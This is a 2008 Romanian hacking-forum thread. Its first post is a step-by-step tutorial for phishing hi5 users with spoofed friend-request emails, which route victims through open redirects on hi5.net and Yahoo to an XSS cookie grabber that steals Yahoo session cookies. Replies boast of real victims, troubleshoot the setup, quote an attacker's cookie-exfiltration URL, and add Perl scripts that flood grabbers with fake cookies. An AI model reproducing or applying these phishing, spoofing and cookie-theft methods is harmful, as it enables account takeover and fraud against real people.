loki Posted April 6, 2008 Report Posted April 6, 2008 Atentie: ACESTE FISIERE SUNT IN SCOP EDUCATIV. NICI EU NICI ECHIPA RSTZONE NU NE ASUMAM RASPUNDEREA UTILIZARII ACESTORA IN ALTE SCOPURI.O metoda foarte buna de a pacali un infocat hi5 spre a-i fura cookie-urile este de a ii trimite un scam hi5 cu link spre grabbere. Aici puteti downloada un formular de email care trimite o astfel de invitatie. Am adaugat in final si o metoda de a trimite linkuri vulnerabile ceva mai credibile folosind http://www.hi5.net in loc de un link direct spre grabber.Download: aiciFisierele incluse:xss.htm - contine un document.location la un xss yahoomail.html - formularul invitatieimail.php - codul ce construieste invitatia hi5Ai nevoie de urmatoarele:- un host care accepta php mail()- un yahoo xss functionabil- un yahoo cookie grabber, foloseste arhiva de pe rstzone.net. (http://www.rstcenter.com/forum/cum-sa-iti-ascunzi-xss-si-yahoo-xss-t8101.rst)1) Editezi xss.htm in notepad si iti adaugi xss-ul tauSugestie: adauga in finalul cookie grabberului tau urmatorul cod:<script>document.location="http://www.hi5.com/friend/mail/displayInbox.do"</script>pentru nu lasa userul sa se prinda prea repede ca a fost pacalit. E un redirect final la hi5.2) Faci upload la fisiere pe hostul tau.3) Deschizi formularul mail.html si te apuci de scris. Este facut destul de intuitiv dar am sa adaug cateva precizari- campurile notate cu * sunt obligatorii. Atentie, mail.php nu contine validari, le adaugati singuri- Numele si prenumele, scrise frumos cu spatii, va construi subiectul "Mihai Viteazu has sent you a Hi5 friend request". Deasemenea primul cuvant va apare la finalul mailului: "Thanks, Mihai".- *Emailul victimei - atentie la greseli ca nu e validat- Numele victimei asa cum apare el pe hi5. Daca nu vreti sa completati va apare "dear user"- O poza de profil - default e un fund de rata luat tot de pe hi5. Dati properties pe o poza mica de pe hi5 si copiati adresa ei.- Redirect (cookie stealer) scrieti http://siteulmeu.com/xss.htm vezi constructia grabberului mai jos:Odata completate toate campurile, victima va primi pe mail un scam identic hi5 invitation:Acum cateva imbunatatiri:Mailul vine de pe adresa info@hi5.com si daca ai un host bun nu se va duce in bulk.Nu stiu daca ati auzit de hi5.net Este un site plin de adverts cum sunt milioane pe net. Linkul catre XSS este construit folosindu-se de acest site ca sa para mult mai credibil. Am modificat un redirect oarecare de pe site ajungand la linkul de mai jos (inclusiv prostiile lui base64):$grabber="http://siteulmeu.com/xss.htm"; (puteti adauga linia asta ca sa nu o mai scrieti de fiecare data)$grabber='http://www.hi5.net/search/redirect.php?f=http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Ficlk%3Fsa%3Dl%26ai%3DU1VHSSBQVUxBIQ==%26num%3D6%26adurl%3D'.$grabber.'&l=U1VHSSBQVUxBIQ==';Siteul hi5.net crede ca e o reclama de-a lui si redirecteaza unde dorim noi. Succesuri! Quote
CODEX Posted April 6, 2008 Report Posted April 6, 2008 Succesuri ? Nu cumva succese ? ))Oricum bv si felicitari pentru atat osteniala si macar te-ai chinuit sa gandesti umpic porblema si cum sa o pui in aplicare ! BV ... Quote
loki Posted April 6, 2008 Author Report Posted April 6, 2008 Deja am avut primele succesuri in interval de 1 ora pe un mail (a dat 2 clickuri ca nu stia de ce nu-i merge friendu). (Ma, tu chiar n-ai auzit de esecurile si succesurile lu Elena Base? ), se pare ca se musca mult mai repede decat la "intra aici, femei goale, etc." Urmeaza sa pregatesc un link la un profil bomba de yahoo cum am scris in alte tutoriale si sa gasesc pe cineva care ma calca pe nervi prin hi5. Quote
CODEX Posted April 6, 2008 Report Posted April 6, 2008 Eh asa cu Hi5 care e disperat de Hi5 il rezolvi rapid ...dar cu celalat care nu prea il intereseaza trebuie alte metode !Appropo : la tine la mail.html sau cum ii ala acolo nu in php , daca bag nikul adresa victimei si celelate se modifica singur sau trebuie sa modific eu in php ? Sper ca ai inteles nu pot sa scru mai mult ca ma grabesc .. Quote
loki Posted April 6, 2008 Author Report Posted April 6, 2008 Eh asa cu Hi5 care e disperat de Hi5 il rezolvi rapid ...dar cu celalat care nu prea il intereseaza trebuie alte metode !Appropo : la tine la mail.html sau cum ii ala acolo nu in php , daca bag nikul adresa victimei si celelate se modifica singur sau trebuie sa modific eu in php ? Sper ca ai inteles nu pot sa scru mai mult ca ma grabesc .. Dupa ce ai totul instalat deschizi doar mail.html, nu il modifici. Nu modifici nimic in php decat daca vrei sa nu mai completezi campul cu linkul la grabber, abia atunci adaugi in mail.php linia aia ($grabber=) ca in primul post (se repeta grabber=). Formularul trebuie completat cap coada, fa probe pe mailul tau, incearca sa ti-l spargi.Am uitat sa precizez modul meu de lucru: eu nu folosesc metoda cu addsense, ci numai cele 2 fisiere grabber de pe rst. Folosesc xss.htm ca sa-mi fie mai simplu sa schimb cand crapa un xss. Quote
CODEX Posted April 6, 2008 Report Posted April 6, 2008 Aha am inteles am reusit Da nu imi vin cookieurile pe garber .. am gresit undeva ..ma voi uita maine ca nu mai am timp acuma !Oricum felicitari ...ca te-ai chinuit .. Quote
moubik Posted April 7, 2008 Report Posted April 7, 2008 bine facut tutorialul, chiar daca este despre scam. Quote
TorQue9 Posted April 13, 2008 Report Posted April 13, 2008 Can't send email to xxxxxx@yahoo.comCare ar putea fi motivul? As fi recunoscator daca m-ati ajuta sa rezolv problema asta Quote
loki Posted April 16, 2008 Author Report Posted April 16, 2008 Can't send email to xxxxxx@yahoo.comCare ar putea fi motivul? As fi recunoscator daca m-ati ajuta sa rezolv problema asta erorile gen can't send mail is din cauza hostului unde ai pus fisierele: nu-ti da voie la mail de pe el spre a preveni fake mailul. Nu ai SMTP activat. Daca e comp personal si RDS e si mai sigur sa nu mearga. Quote
go_sword Posted April 17, 2008 Report Posted April 17, 2008 tocmai am primit un astfel de mailam o intrebare : daca deschid mailu mi le-a luat ?sau doar daca dau click pe acceptare...?am observat ca acel link face redirectionarea catre un xss de yahoomoubik: xss ascuns. te rog nu mai posta acest xssLE:Am reusit sa'l fac sa mearga dupa modelul lui lokipaki , adica cu grabber.php in link dar , folosind google_adsense.php. Din pacate merge doar pe Firefox, pe IE 6 apare chestia aia de la privacy cand intra victima pe pagina, nu trimite cookie-ul . O sa mai incerc si alte modalitati ca sigur merge si altfel .Bafta.The "almost perfect" stealing method ;-)Urat este https:// ala .... daca nu apasa YES nu face nimic.deci sa stau linistit ? Quote
loki Posted April 17, 2008 Author Report Posted April 17, 2008 pai de ce nu il analizezi? - stringfromcharcode=http://66.118.142.80/~createch/hi5/c.php?cookie= (nu-i al meu in smartwhois iti zice http://server.contentwebz.com, poate au hosting bun)&l=U1VHSSBQVUxBIQ = SUGI PULA! (base64) mdah, e exact dupa modelul prezentat mai susInseamna ca ai prieteni umple-i logurile da-i flood pe 127.0.0.1 Quote
go_sword Posted April 17, 2008 Report Posted April 17, 2008 Inseamna ca ai prieteni am o gramada de 'prieteni' da-i flood pe 127.0.0.1 desigur...gasesti mirc-ari destui care sa faca asta Quote
Vhaerun Posted April 17, 2008 Report Posted April 17, 2008 This should do the trick .use strict;use WWW::Mechanize;my $url = shift || die "url\n";my $mech = WWW::Mechanize->new();sub rand_word { my $size = shift; my @letters = ("a".."z"); my $index = 0; my $ret = ""; while($index != $size) { $ret .= $letters[rand @letters]; $index++; } return $ret}while(1) { my $combined = $url . rand_word(20); $mech->get($combined); sleep(1);}EDIT : diseara cand ajung acasa , pun o versiune mai buna . La versiunea urmatoare nu va putea deosebi cookie-urile intre ele . Si probabil se va plictisi incercandu-le . Sau nu , daca le incearca in mod automat Quote
go_sword Posted April 17, 2008 Report Posted April 17, 2008 in fine...azi am dat add pe messenger la un vip.xss-ul e privat,deci e clar cine e atacatorulrevin cu un LE.poate mi se da voie sa postez ce stiu despre elps: thanks perl ninja astept cealalta versiune Quote
moubik Posted April 17, 2008 Report Posted April 17, 2008 This should do the trick .use strict;use WWW::Mechanize;my $url = shift || die "url\n";my $mech = WWW::Mechanize->new();sub rand_word { my $size = shift; my @letters = ("a".."z"); my $index = 0; my $ret = ""; while($index != $size) { $ret .= $letters[rand @letters]; $index++; } return $ret}while(1) { my $combined = $url . rand_word(20); $mech->get($combined); sleep(1);}EDIT : diseara cand ajung acasa , pun o versiune mai buna . La versiunea urmatoare nu va putea deosebi cookie-urile intre ele . Si probabil se va plictisi incercandu-le . Sau nu , daca le incearca in mod automat cand a incercat unul sa-mi ia cookie-ul de yahoo asta am facut si eu, i-am umplut logurile. plus ca exista sanse mari ca sa se sesizeze hostingul.. Quote
loki Posted April 17, 2008 Author Report Posted April 17, 2008 vezi ca are si un yahoo scam page pe acolo Quote
Vhaerun Posted April 17, 2008 Report Posted April 17, 2008 Versiunea 2Arata a cookie valid , nu o sa fie insa use strict;use warnings;use WWW::Mechanize;sub generate_word { my $size = shift; my @data = @{ shift @_ }; my $idx = 0; my $gen = ""; while($idx != $size) { $gen .= $data[rand @data]; $idx++; } $gen;}sub generate_cookie { my @d_l = ("a" .. "z","A".."Z",0..9); my @l = ("a" .. "z","A".."Z"); my @d = (0..9); my @d_u = (0..9,"_"); return "B=@{[generate_word(13,\@d_l)]}&b=@{[generate_word(1,\@d)]}&s=@{[generate_word(2,\@d_l)]}; YLS=v=@{[generate_word(1,\@d)]}&p=1&n=1; F=a=@{[generate_word(64,\@d_l)]}&b=@{[generate_word(4,\@d_l)]}; Y=v=1&n=@{[generate_word(16,\@d_l)]}; YM.LC=v=1&m=@{[generate_word(100,\@d_u)]}\n";}my $link = shift || die "site\n";my $mech = WWW::Mechanize->new();while(1) { $mech->get($link . generate_cookie); sleep(1);} Quote
go_sword Posted April 17, 2008 Report Posted April 17, 2008 de unde ai invatat perl asa de bine ? Quote
Vhaerun Posted April 17, 2008 Report Posted April 17, 2008 programand .daca poti trece de sintaxa criptica ( sperie incepatorii ) , atunci o sa vezi ca perl e un limbaj destul de usor .ca programatori , singurii oameni pe care ii respect sunt cei care stiu perl . Java/C#/Basic mi se par niste limbaje prea verbose ( ca sa zic asa ) . Perl e singurul limbaj care are o comunitate foarte puternica ( perlmonks ) , si module pt orice treaba . Plus ca e foarte popular in lumea (white|grey|black) hat . Quote
loki Posted April 17, 2008 Author Report Posted April 17, 2008 apropo, am dat o cautare pe IP-ul ala... imi gaseste un google groups cu o intreaga lista de mailuri pe langa reclamatii de IP spam la care baiatul cred ca e doar un client al hostului. Am dat click pe ceva si ma intreba daca vreau sa ma inscriu pe hi5 cu mailu unui arab. Amuzati-va putin pe goolgle search. Quote
nike Posted April 19, 2008 Report Posted April 19, 2008 1) Editezi xss.htm in notepad si iti adaugi xss-ul tau Sugestie: adauga in finalul cookie grabberului tau urmatorul cod: <script>document.location="http://www.hi5.com/friend/mail/displayInbox.do"</script> pentru nu lasa userul sa se prinda prea repede ca a fost pacalit. E un redirect final la hi5. Aici poti pune un redirect catre un scam de hi5 si apoi catre hi5-ul bun ... si iei si parola de la hi5 ... am avut eu facut asa mai de mult... exact metoda de ai prez u mai sus. Quote
loki Posted April 24, 2008 Author Report Posted April 24, 2008 uff din pacate am obs ceva naspa: testand pe mozilla si pe IE6:Pei IE6, daca link-ul nu e de yahoo presupun, cand iti deschide intr-o noua fereastra nu iti mai trimite cookie-urile Y si T. Pe firefox merge. Nu am lucrat de mult cu IE6 si abia azi am observat dupa niste teste. Nu stiu pe IE7. Asta inseamna ca ar trebui pus xss-u direct in mail si pica metoda daca omu foloseste IE Pe firefox alta buba: imi apare in cookie un CF_RCNT care este confundat cu T Am sa mai testez, probabil trebuie niste optimizari si aici.LAST EDIT: nu mai face probleme pe IE... oi fi fost eu logat securizat? Ori face din cand in cand :shock: Apropo daca va trebuie redirect yahoo asemanator cu cel hi5:http:// us.ard.yahoo.com/SIG=14vbt8d5r/M=653465.12502339.12947270.1414694/D=mail/S=150500014:LREC/Y=YAHOO/EXP=1209047730/L=qhkfY0S0xCvR45RmR8SjiAAPVn99BUgQfpIAA8Hg/B=AuL3C0WTWUI-/J=1209040530355004/A=5333654/R=0/*http://www.google.comScoateti spatul si enterurile. In loc de google va puneti situl, scamul, ce vreti, merge instant. Ideea: furati linkul de la flashul care va apare la welcome in mail (ca nu stiu daca linkul expira odata cu reclama). Quote